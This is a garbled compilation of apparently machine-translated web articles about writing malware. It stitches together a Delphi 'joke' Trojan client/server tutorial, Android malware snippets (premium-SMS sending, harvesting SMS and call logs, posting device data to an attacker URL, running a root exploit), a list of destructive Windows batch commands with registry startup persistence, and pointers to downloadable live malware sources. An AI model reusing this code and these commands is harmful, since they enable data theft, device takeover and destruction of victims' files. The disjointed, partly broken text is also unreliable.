If you are interested in seeing how “Server-Client Programs” are written and how they work in a real example, I suggest reading the post to the end. It will be interesting!

I decided to write an example program in Delphi! Because it's simpler and works well for a small but real example. As for the formidable word “” which I mentioned above, here it really turns out to be a real Trojan, but with small and harmless functionality.

You will learn how to write " "and how they work from the inside! But, there is one “BUT”: Trojans do not write, because - this will be described below. Since in our example, " Server room"part of the program will weigh a lot ( This is not acceptable for a real Trojan), and we will not hide it in the system. In real life, "Malware" things are a little different.

They are trying to develop the server part of the program with a small size, well, approximately “100 KB” Plus or minus some KB. And they hide it in the system, so that it will take a long time to find it!…

But everything is smooth, the development principle is the same! And this example is ideal for understanding how programs work based on the “Server - Client” principle. We just don’t have the right tone for developing a Trojan, but do we need it? Right. NO!!! We are good guys and we are not going to misbehave!

How programs work based on the “Server-Client” principle

Simply and in a nutshell, the picture looks like this: You run “ Client"part of the program, as a rule, it has a “GUI”, that is, a user interface (If the client is not a console one)

On the computer you want to access, " Server room“part of the program, it opens a specific port on someone else’s computer and is not visible in the system.

Connections occur through this port. You specify in the client the port and IP address of the computer on which the server is running, connect to the server and can safely perform some actions on someone else’s PC from your computer! You can also read my last post and find out:

I hope that I explained it here, it seems clear and in simple human language! If something is not clear, further, with an example, everything will become clear! Next, let's decide what actions I will perform on the remote PC as a result of the work of our little Trojan!

What is the functionality in this example of the Server – Client program.

Honestly, at this stage, when I was thinking about what to show, I somehow hesitated and couldn’t come up with something interesting! In general, let there be functionality from one possibility and terribly simple:

— The user will receive your message.

I don't see any point in adding any other features. Since, I think that for the sake of example and understanding this is quite enough. Also, I think you shouldn’t write a lot of code, what is below is enough to look at the program from the inside!

And the place of the message can be anything, it depends on the imagination of the person who decided to write a Trojan and on his knowledge of programming.

Well, we’ll have such a joke! A person sitting at a computer will suddenly receive a message, for example

« Hello, I'm hanging around your computer»

Can you imagine the person's reaction? I think it's funny, it would be nice to see his facial expression!!!

Development of a program based on the “Server – Client” principle

Let's get to the fun part! And we will start with the development of the “ Servers“Then we’ll write a client for it! I will not explain the program code, I will simply give examples, after all, I do not have a blog on programming, and the purpose of the post is to show step by step the process of developing such programs of the “Server - Client” type.

Server development!

Initially, you need to teach the “Server” to open some port on the computer in order to be able to connect to it from the “Client” in the future, and only after that we will teach you how to accept commands and perform some actions on the PC.

Let's open the port with the following code, which is painfully simple:

Delphi/Pascal

procedure TForm1.FormCreate(Sender: TObject); begin ServerSocket1.Port:= 666; ServerSocket1.Active:= true; end;

procedure TForm1 . FormCreate(Sender: TObject); begin ServerSocket1. Port: =666; ServerSocket1. Active: =true; end ;

Now if you run the program, a simple empty window will appear without any buttons or other elements. And most importantly, port number “666” will be open on the computer. It is to this port that we will subsequently send commands to the server, and it, in turn, will process them.

For now, let’s make sure that the server is running and the port is open, remember the “netstat” command and look at the result.

As we can see on the computer, as a result of launching our program, port number “666” was indeed opened. This only means one thing, the program is working, and it’s time to teach “ Server» receive the message.

Delphi/Pascal

procedure TForm1.ServerSocket1ClientRead(Sender: TObject; Socket: TCustomWinSocket); var comm:string; Begin komm:=socket.ReceiveText; if copy(komm,1,12) = "MESSAGE_TEXT" then begin Delete(komm, 1, 12); ShowMessage(comm); end; end;

procedure TForm1 . ServerSocket1ClientRead (Sender : TObject ; Socket: TCustomWinSocket); comm: string; Begin comm := socket . ReceiveText ; if copy (komm , 1 , 12 ) ="MESSAGE_TEXT" then begin Delete(komm, 1, 12); ShowMessage(komm); end ; end ;

Here things are as follows! If the server receives a command called “MESSAGE_TEXT” ( The name can be anything) then the “ShowMessage” procedure will work and show the message that came along with the command and is stored in the string variable “komm”

Accordingly, we will type the text of the message in “ Client"and it can be of any content!

However, that’s all for the development “ Server» parts are finished. As a result, we got the file “ Server.exe" and for now we will put it aside until we write " Client»

Client development!

For obvious reasons, we will have a client with graphical interface user interface (GUI) and must have controls, buttons and input fields. I ended up with this type of program:

Let's decide on all the elements! Although it’s clear, as they say, I’ll explain just in case.

— IP: Fields for entering the IP computer where the server is running.
— Port: Specify the port number on which the server hangs.
— Connect: Button to connect to the server.
— Text message: Field for entering the message to be sent.
- Send a message…: Accordingly, a button to send a message.
— Connection status: Here we will find out whether we are connected or not!

Delphi/Pascal

procedure TForm1.Button1Click(Sender: TObject); begin ClientSocket.Host:= IP.Text; ClientSocket.Port:= StrToInt(Port.Text); ClientSocket.Open; end;

procedure TForm1 . Button1Click(Sender: TObject); begin ClientSocket. Host: =IP. Text ; ClientSocket. Port : =StrToInt (Port . Text ) ; ClientSocket. Open ; end ;

You can start the program right now and try to connect to “ To the server“but we won’t know the result, whether we connected or not. Before checking, we will correct this and teach the program to show the connection result.

Delphi/Pascal

procedure TForm1.ClientSocketConnect(Sender: TObject; Socket: TCustomWinSocket); begin Label4.Caption:= ("Successfully connected to: " + IP.Text); Label4.Font.Color:= clGreen; end;

And in case all the currents were unable to connect to the server, for example because “ Server" is not running on the remote PC and, accordingly, port "666" is closed.

Delphi/Pascal

Procedure TForm1.ClientSocketError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); begin if ErrorCode = 10061 then begin ClientSocket.Active:= False; Label4.Font.Color:= clRed; Label4.Caption:= ("Failed to connect to:" + IP.Text); ErrorCode:= 0; end; end;

procedure TForm1 . ClientSocketError(Sender: TObject; Socket: TCustomWinSocket; ErrorEvent : TErrorEvent ; var ErrorCode: Integer); begin If ErrorCode =10061 then begin ClientSocket. Active : =False ; Label4. Font. Color: =clRed; Label4. Caption: =( "Could not connect to:"+IP . Text); ErrorCode: =0; end ; end ;

Now let's see how the program works. First, we start the client, but do not start the server, to check whether a message will be displayed stating that the connection failed.

In the collection of malicious Android applications, some antivirus laboratories already contains more than 10 million samples. This figure excites the imagination, but approximately 9 million 995 thousand of them are renamed copies of the original viruses. But if you analyze the source code of the remaining several thousand malware samples, you will notice that they are all combined from a small number of unique functional blocks (several modified and combined in different ways).

The thing is that virusmakers most often pursue very trivial tasks:

• send an SMS to a paid number;
• take possession confidential information user ( telephone numbers, message texts, data from the SD card, and so on);
• collect data about the infected device;
• take over administrative rights on the device (to install applications without the owner’s permission or to maliciously disable the device);
• track logins, passwords and payment card data that the user enters on the websites of Internet banking systems. How do they do it? Let's try to penetrate the dark world of mobile virtualization and see what happens there.

Sending SMS

Who uses:

• AdSms;
• FakePlayer;
• HippoSms.

The most common type of viruses are SMS Trojans. These viruses simply send messages to premium numbers without the user's consent. It’s very easy to create such a program or rewrite a ready-made one for the desired number. And the process of obtaining benefits is extremely simplified - unlike, for example, tracking banking data.

The following is simplest example code. This is a basic function sending SMS. It can be complicated by checking the sending status, selecting numbers depending on the subscriber’s location and then deleting the SMS.

Private static SendSms (String DestNumber, String SmsText) ( // Attempting to run the sendTextMessage method of the SmsManager object ( standard program to send SMS from the current device) with a minimum number of parameters: recipient number and message text try( SmsManager.getDefault().sendTextMessage(DestNumber,null,SmsText,null,null); return true; ) )

Where to look for the virus code

In the vast majority of cases, a phone is infected through the installation of applications. Any Android application exists as a file with the apk extension, which is essentially an archive. You can view its contents from using Android SDK, converter APK files into JAR and Java bytecode decompiler. The application build (APK) consists of the following parts:

• resources.arsc - resource table;
• res (folder) - actual resources (icons, etc.);
• META-INF (folder) - contains files with the following contents: checksums resources, application certificate and APK assembly description;
• AndroidManifest.xml - all kinds of service information. Including permissions that the application requests before installation for its correct operation;
• classes.dex - you've probably heard that in Android operating systems systems, all code is executed using the Dalvik virtual machine (starting with version 4.4, ART support appears), which does not understand regular Java bytecode. That's why there are files with the dex extension. It, along with the necessary and useful classes (which are responsible for the functionality of the application), also contains malicious ones (virus code, which we analyze in this article).

Recording user information in text file

Who uses:

• NickySpy;
• SmsSpy.

There is a category of viruses that preys on users' personal data. The mechanism of their action is also simple. They either upload user files to their creator’s server, or pre-collect some data in txt (CSV, XML - it doesn’t matter). Contacts of any type, messages from different instant messengers, media files, etc. may be of interest to attackers.

SMS messages from infected users are especially valuable for the phone numbers of senders and recipients - they can be used to supplement the database for spam mailings. Less commonly, viruses of this kind are used to infect the devices of specific individuals - the next time your girlfriend invites you to test the Android application she wrote (ah, caramba! - Ed.), don’t let your guard down :).

// Count the number of SMS on the device arrayOfObject = (Object)localBundle.get("pdus"); int j=arrayOfObject.length; // Loop through each SMS i=1 while (true) ( ​​if(i>=j) break; // Create an SMS message object SmsMessage localSmsMessage=SmsMessage.createFrompdu((byte)arrayOfObject[i]); // Place into string variables the sender number, text and time of sending SMS String MessageNumber = localSmsMessage.getOriginatingAddress(); String MessageText = localSmsMessage.getDisplayMessageBody(); long l= localSmsMessage.getTimestampMillis(); Date localDate=new Date(l); String MessageTimeDate = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(localDate); // Form a string from the received data and write it to a text file using the custom WriteRec method String MessageInfo= 7MessageNumber+"#"+ MessageText+"#" + MessageTimeDate+";" WriteRec(paramContext,"sms.txt",MessageInfo); // Move to the next message i+=1; ) It is also convenient to replenish the spam list from the subscriber’s call history. This code can be run when there is an incoming call: If (parmIntent.getAction().equals("android.intent.action.NEW_OUTGOING_CALL")) ( // Put the subscriber number in the variable String phonenumber=paramIntent.getStringExtra("android.intent. extra.PHONE_NUMBER"); // Form a string from the number and date of the call String PhoneCallRecord= phonenumber +"#"+getSystemTime(); // Call the WriteRec() method (its code is not given here), which adds a line to the text file with call history WriteRec(paramContext,"phonecall.txt", PhoneCallRecord); )

After the information is recorded, it is forwarded to the “right hands”. The code below uploads the call history to the server:

Private void uploadPhonecallHistory() throws IDException ( while(true) ( ​​return; // Check if the file we need exists if(!fileIsExists(/data/data/spyapp.pg/files/phonecall.txt")) continue; // Create an object - file uploader UploadFiles localUploadFiles=new UploadFiles(); String uploadkeynode=getKeyNode("uid","uid_v"); // Run the method.advanceduploadfile (its code is not given here) to upload the file to the "virus maker" server localUploadFiles. advanceduploadfile(uploadkeynode,"/data/data/spyapp.pg/files/phonecall.txt"); ) )

Collection of information

Who uses:

• DroidKungFu;
• DroidDream;
• the vast majority of malware of all similar types.

In principle, any virus maker would benefit from information about devices infected by his programs. It's very easy to get. An array is created with data about the phone's properties (the full list can be found in the Android developer's manual) and sent as a POST request to a PHP script (the language is not important) on the attacker's server, which processes the data and places it in the database for later use.

Private void reportState(int paramInt, string paramString) ( // Create an array and put service information into it ArrayList UserInformation=new ArrayList(); UserInformation.add(new BasicNameValuePair("imei", this.mImei)); UserInformation.add( new BasicNameValuePair("taskid", this.mTaskId)); UserInformation.add(new BasicNameValuePair("state", Integer.toString(paramInt))); // If the function has a parameter defined "paramString(comment)", put it in an array and its if(paramStrng !=null)&&(!"".equals(paramString))) UserInformation.add(new BasicNameValuePair("comment", paramString)); // Create HTTP POST request with the address of the script that collects data HttpPost localHttpPost = new HttpPost("http://search.virusxxxdomain.com:8511/search/rtpy.php"); try ( // Add our data array to the request and execute it using the standard HTTP client localHttpPost.setEntity(new UrlEncodeFormEntity(UserInformation, "UTF-8"))); new DefaultHttpClient().execute(localHttpPost).getStatusLine.getStatusCode(); return; ) )

Rooting

Who uses:

• DroidKungFu;
• DroidDream;
• RootSmart.

One of the worst things that can happen to an Android device is having it rooted by a virus. After all, after this, a malicious program can do anything with it: install other viruses, change settings hardware. This action is performed by sequentially launching exploits:

Private void RootFunc() ( ApplicationInfo localApplicationInfo =getApplicationInfo(); /*"ratc" is a copy of the famous Rage Against The Cage root exploit. Kiall - stops all processes running by the current application. Gjsvro - exploit for acquiring udev rights (used in Linux systems for advanced work with hardware and network interfaces). Copy all this to the right place */ Utils.copyAssets(this,"ratc","/data/data"+localApplicationInfo.packageName + "/ratc"); Utils .copyAssets(this,"killall","/data/data"+localApplicationInfo.packageName + "/killall");Utils.copyAssets(this,"gjsvro","/data/data"+localApplicationInfo.packageName + "/gjsvro "); //And run using the command line Utils.oldrun("/system/bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/ratc"); Utils.oldrun("/system/ bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/killall"); Utils.oldrun("/system/bin/chmod", "4755 /data/data"+localApplicationInfo.packageName + "/ gjsvro"); new MyTread.start(); )

Websites about mobile malware

Blog of Kasperskiy Lab experts This resource contains high-quality and detailed articles about many aspects computer security, including about Android viruses. It is worth visiting this site regularly to keep up to date with the latest developments.

The group is dedicated open source a tool for all kinds of manipulations with Android application code (decompilation and modification of DEX/ODEX/APK files, and so on). Androguard also contains an extensive database of articles about viruses. Besides short reviews functionality and protection methods, there are detailed analyzes of malware code.

Mobile Threats section at www.fortiguard.com Encyclopedia of telephone viruses. Each article is a review of functionality, seasoned with a significant amount of technical details. In addition to information about threats to operating system Android, there are also articles about viruses for Symbian OS, iOS and other platforms.

Virus protection

Some users believe that if you download applications exclusively from Google Play and install an antivirus on your smartphone, this absolutely guarantees security. Don’t delude yourself: reports regularly appear on the Internet about malware being found on the official market. And the number of newly appeared malicious programs is measured in hundreds of thousands per month, which makes it difficult for them to get into databases in a timely manner antivirus programs. A real guarantee of security can come from manually reviewing the code of the APK file before installing it on your phone. You don't need to be a coding guru to spot malicious snippets. And our article will help you with this.

Conclusion

As we can see from the examples, mobile virus-making is no different in terms of technological complexity. Of course, these examples are simplified to fit the log format - first of all, error and exception handlers are omitted, as well as certain technical details, the absence of which will not prevent you from understanding the principles of the Android malware, but will protect you from unnecessary experiments. We don't support the creation of viruses, do we? 🙂

here are the commands
assoc .exe=.mp3 - Execs run like music label E: pridurok - change screw to idiot time 00:00 - change time
date 03.13.36-change date assoc .lnk=.txt-change labels in txt file copy %0 F:\Work.bat-copying an object

1) A program for deleting files from a flash drive (if one is inserted) and renaming it.
del F:\ *.* /q
label F:HACK
2) A program for changing the date and time on a computer and copying it to drive C and a flash drive.
time 14:13
date 11.07.12
copy %0 C:\Time.bat
copy %0 F:\Time.bat
----------
>nul - hide line command
%SystemRoot%/system32/rundll32 user32, SwapMouseButton - swaps mouse keys
---------------
copy ""%0″" "%SystemRoot%\system32\File.bat"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
A very cruel command: adds the program to OS startup.
“del x:\y *.* /q” - will delete all files on drive x in folder y (except folders) (example del F:\Data*.* /q);
“net user “x” /add” - will add a user named x to the computer (example net user “Smoked” /add);
“@echo off” is introduced at the beginning of our virus and hides everything
rundll32 user,disableoemlayer - system crash (!) - disable all input/output functions (keyboard, display, mouse). The result will be a black screen with a cursor and the system will not respond to anything, but Windows continues to work.
del *.* /q (after running this command, all files except folders that were in the folder where the virus was launched will be deleted!!!
md 1 - create folders
To run a file during Windows boot, rename the file to Autoexec.bat
Echo Virus Loading - inscription on the screen virus lodin
del c:Program Files/q (deletes all files from this folder)
reg - direct work with the registry. View reg/? everyone!
rcp - file exchange via rcp in ascii
runas - on behalf of the user
tasklist - Displays applications and sessions associated with it.
taskkill - allows you to kill one or more processes
tftp - trivial ftp
tskill - kill a process
reg - a utility for interacting with the registry
bootcfg - boot.ini settings
append - allows you to open deleted files as if they were in the current.
getmac - get mac
logoff - Log off the user session.
mem - display information about current processes in RAM
mqbkup - archiving
netsh - ??
openfiles - view open files.
rsh - execute commands on remote hosts running rsh
sc - command line ??
rexec - execute commands on remote hosts running rexec
shutdown - turn off (hehe) local or remote computer.
systeminfo - displays information about the computer.
schtasks - task scheduler.
xcopy - copy files and directories.
tsshutdn - shutdown the server in the prescribed manner.
set - output, set and delete cmd.exe environment variables. System properties (example: “my computer”) - additionally - Environment variables. Not all the variables are there, but a lot! Everything looks just set.
By the way, here are some RunDLL commands that can be used when creating batch files

rundll32 user,wnetdisconnectdialog
“Shutdown” window network drive” Call

rundll32 user,disableoemlayer
Provoke failure

rundll32 user,repaintscreen
Update (how)

rundll32 user,setcursorpos
Place Maus-Cursor left up

rundll32 diskcopy,DiskCopyRunDll
Open the “Copy Disk” window

rundll32 rnaui.dll,RnaWizard /1
Open the “Connection setup” dialog (/1 = no window)

rundll32 shell,shellexecute
Explorer-Open window in root directory

rundll32 shell32,OpenAs_RunDLL
“Open with...” window call***

rundll32 shell32,SHFormatDrive
Open the “Format: Disk 3.5(A)” window

rundll32 shell32,ShellAboutA
Info-Box (about Windows) call

rundll32 shell32,SHExitWindowsEx 0
Windows 98 restart (without autoexec.bat, etc.)

rundll32 shell32,SHExitWindowsEx 1
Finish working with Windows 98

rundll32 shell32,SHExitWindowsEx 2
Windows-98-PC boot

rundll32 shell32,SHExitWindowsEx -1
Windows-98-Explorer start again

rundll32 shell32,Control_RunDLL
Open the “Control Panel” window

rundll32 shell32,Control_RunDLL desk.cpl
Open “Display Properties”

rundll32 shell32,Control_RunDLL main.cpl
Open Modul-Control Panel from MAIN.CPL **

rundll32 krnl386.exe,exitkernel
exit Windows without any messages/questions

rundll32 user,swapmousebutton
“Rearrange” mouse keys *

rundll32 keyboard,disable
“Disable” keyboard *

rundll32 mouse,disable
“Disable” mouse *

rundll rnaui.dll,RnaDial “provider”
Call the “Connection setup” window with the name “provider”

rundll32 user,tilechildwindows
line up all non-minimized windows from top to bottom

rundll32 user,cascadechildwindows
arrange all non-minimized windows in a cascade

rundll32 sysdm.cpl,InstallDevice_Rundll
(the only option in W98) install non-Plug&Play equipment

rundll32 msprint2.dll,RUNDLL_PrintTestPage
select a printer in the menu that appears and send a test to it

rundll32 user,setcaretblinktime
set a new cursor blinking frequency *

rundll32 user, setdoubleclicktime
set new double click speed *

rundll32 setupx.dll,InstallHinfSection
DefaultInstall 130; C:\file.inf
window “Reboot the system. Produce it now? ъ Yes/no ъ” ****

ASSOC - Displays or modifies file extension associations
AT - Schedules commands and programs to be executed on the computer.
ATTRIB - Displays or changes file attributes.
BREAK - Sets or cancels the combination check.
CACLS - Displays or modifies access control lists (ACLs) for files.
CALL - Calls one *.BAT file from another.
CD - Displays the name or changes the name of the current directory.
CHCP - Displays or sets the active code page number.
CHDIR - Displays the name or changes the name of the current directory.
CHKDSK - Checks the disk and displays a status report.
CLS - Clears the screen.
CMD - Starts a new instance of the interpreter Windows commands N.T.
COLOR - Sets the default colors for the foreground and background of the console.
COMMAND - Starts a new copy of the Windows command interpreter.
COMP - Compares the contents of two files or file settings.
COMPACT - Displays or modifies file compression on Windows NT (NTFS) patricians.
CONVERT - Converts FAT volumes to format file system Windows NT(NTFS). You cannot convert the current drive.
COPY - Copies one or more files to another place.
CTTY - Changes the terminal device used to control your system.
DATE - Displays or sets the date.
DEL - Deletes one or more files.
DEBUG - Performs program debugging, program testing, and tool editing.
DIR - Displays a list of files and subdirectories in a directory.
DISKCOMP - Compares the contents of two floppy disks.
DISKCOPY - Copies the contents of one floppy disk to another.
DOSKEY - Edits command lines, restores Windows commands and creates a macro.
ECHO - Displays messages, or turns command output on/off.
EMM386 - Enables/disables EMM386 extended memory support.
ENDLOCAL - Ends localization of changes environment in *.BAT file.
ERASE - Deletes one or more files.
EXIT - Terminates program execution (command interpreter).
EXTRACT - A tool for extracting information from CAB files.
FC - Compares two files or file settings, and displays the difference between them.
FIND - Searches for a text string in a file or files.
FINDSTR - Search for strings in files.
FOR - Executes the specified command for each file in a set of files.
FORMAT - Formats the disk for use with Windows.
FTYPE - Displays or modifies the file types used in extension associations.
GOTO - Directs the Windows NT command interpreter to the marked line in the *.BAT file.
GRAFTABL - Windows' ability to display pseudographics characters inserted in graphics mode.
HELP - Provides Help information for Windows commands.
IF - Performs condition processing in a *.BAT file.
KEYB - Configures the keyboard for the specified language.
LABEL - Creates, modifies, or deletes a volume label on a disk.
LOADHIGH(LH) - Loads the program into the upper memory addresses.
MD - Creates a directory.
MEM - Displays the amount of used and free memory on your system.
MKDIR - Creates a directory.
MODE - Configures the system device.
MORE - Displays the output of one screen at a time.
MOVE - Moves one or more files from one directory to another on the same disk.
NETSTAT - Displays protocol statistics and current TCP/IP network connections.
NLSFUNC - Loads country-specific information.
PATH - Displays or sets the search path for executable files.
PAUSE - Pauses processing of the *.BAT file and displays a message.
POPD - Restores the previous value of the current directory saved by PUSHD.
PRINT - Prints a text file.
PROMPT - Changes the Windows command prompt.
PUSHD - Saves the current directory, then changes it.
RD - Removes a directory.
RECOVER - Recovers readable information from a bad or defective disk.
REM - Writes comments (notes) to *.BAT files or CONFIG.SYS.
REN - Renames a file or files.
RENAME - Renames the file or files.
REPLACE - Replaces files.
RESTORE - Restores files that were backed up using the BACKUP command.
RMDIR - Deletes a directory.
SET - Displays, sets or deletes Environment Variables Windows.
SETLOCAL - Starts localizing environment changes to the *.BAT file.
SETVER - Sets the MS-DOS version number that Windows reports to the program.
SHIFT - Shifts the position of the replaced parameters in the *.BAT file.
SMARTDRV - Installs and configures the caching utility SMART drive- drive.
SORT - Sorts the input stream.
START - Starts a separate window for execution the specified program or commands.
SUBST - Associates a path with a drive letter.
SYS - Copies files MS-DOS systems and a command interpreter to the drive you specify.
TIME - Displays or sets the system time.
TITLE - Sets the window title for the session.
TREE - Graphically displays the directory structure in the drive or path.
TYPE - Displays the contents of a text file.
VER - Displays the Windows version.
VERIFY - Tells Windows whether to verify that files are being written to disk correctly.
VOL - Displays the disk volume label and serial number.
XCOPY - Copies files and directory trees.

Well, if you want to “kill” Windows then:
@echo off
start explorer
start explorer
start explorer
start explorer - repeat 100 times again and add it to startup.

Where to download virus samples from source code and a detailed description?

Finding a collection of current viruses, and even more so with a description and source code, is not an easy task. We have already told you where to analyze and study. Today I will tell you about another source where you can find and download, but this time it’s not just malware found on the network, but executable files and virus sources with detailed information.

In this article you will learn about a couple of interesting projects that offer to plunge into the world of the source code of all kinds of Trojans, botnets, stealers, worms, etc.

• Preface
• Virus sources
• theZoo Project
• Malware Project

Why and who might need virus samples?

Executable files and virus sources may be needed to analyze the technologies used by malware, to study the behavior of viruses in the system (monitoring the file system, processes, etc.) and testing antiviruses. Employees of antivirus companies are willing to pay money to obtain the source code of a new virus.

Is it legal to download viruses?

You can download virus samples for study and analysis on your computer, but you cannot distribute them and infect others with them. Read more about this in Article 273 of the Criminal Code of the Russian Federation.

The purpose of these projects is to give specialists from antivirus companies and people interested in virus analysis an understanding of the device malicious code malware.

Attention! Please keep in mind that the downloaded files are working viruses. Some of them will try to infect your computer. Never run downloaded files on your main computer. I also do not recommend downloading virus samples without special knowledge of malware analysis.

In any case, the website www.site does not bear any responsibility for any damage caused by you to your own or other people’s computers.

I highly recommend using . Don't forget about malicious worms that will try to spread and escape from the virtual machine. To avoid this, I recommend disabling all Guest Additions virtual machines, network access, etc. You can find out how to do this from the link above.

Virus sources: theZoo Project

Let's start the review with the project theZoo, which translates as a zoo (the authors are fine with humor). It is located in the Githab repository.

The goal of the project is to make the study of viruses accessible. The authors collect and update the virus database. With theZoo you can access popular malware samples.

Virus samples: theZoo Project

Both the executable file and the source code are offered for downloading and studying.

How to use theZoo?

You can use theZoo project in different ways: directly from the site or using the framework. We will look at both methods. Let's start with the first one.

So, we go to the site and see several directories and files.

Virus executables are in the directory:

theZoo/malwares/Binaries/

In it you will find the virus executable file. For each individual malware there is a separate directory containing 4 files: the malware itself in encrypted form in ZIP archive, SHA256 and MD5 - archive checksums for comparison and password for the encrypted archive.

Virus executables: Androrat Trojan

Virus source code are in the directory:

theZoo/malwares/Source/Original/

Each directory contains four similar files. Everything is the same as with executable files.

Virus sources: Dendroid Trojan

There is help for each individual sample, but to use the help you need to install the framework.

To install theZoo framework, use the command:

git clone https://github.com/ytisf/theZoo

Requirements: urllib2, python3

Commands: search, use, get, info, list all, report-mal, update-db, exit. Learn more about commands using the help command.

So, we’ve dealt with this project, now let’s look at another one.

Virus Samples: Project Malware

The Malware project is also located on Githab. The selection of viruses is not as large as in a zoo, but it is updated more often. Among a small number of malicious programs you can find the source codes of Trojans, botnets, ransomware, password stealers and other goodies.

Here is the list for today:

• Alina Spark (Troyan)
• Bleeding Life 2 (Expolit pack)
• Carberp (Botnet)
• Carberp (Banking Trojan)
• Crimepack 3.1.3 (Exploit pack)
• Dendroid (Trojan for Android)
• Dexter v2 (Trojan)
• Eda2, Stolich, Win32.Stolich (Ransomware)
• FlexiSpy (Spyware)
• (Framework)
• GMBot (Android Trojan)
• Gozi-ISFB - (Banking Trojan)
• Grum (Spam bot)
• Hacking Team RCS ()
• Hidden Tear (Ransomware)
• KINS (Banking Trojan)
• Mirai (Internet of Things Botnet)
• Pony 2.0 (Password Stealer)
• PowerLoader (Botnet)
• RIG Front-end (Exploit pack)
• Rovnix (Bootkit)
• Tinba (Banking Trojan)
• TinyNuke (Banking Trojan)
• Trochilus, RedLeaves (RAT)
• Zeus (Banking Trojan)

Virus source code: Malware Project

For example, let's go to the folder of the Alina Trojan. Here we are offered several directories, among which there are source codes. In addition, at the bottom, the authors added links to information regarding the malware.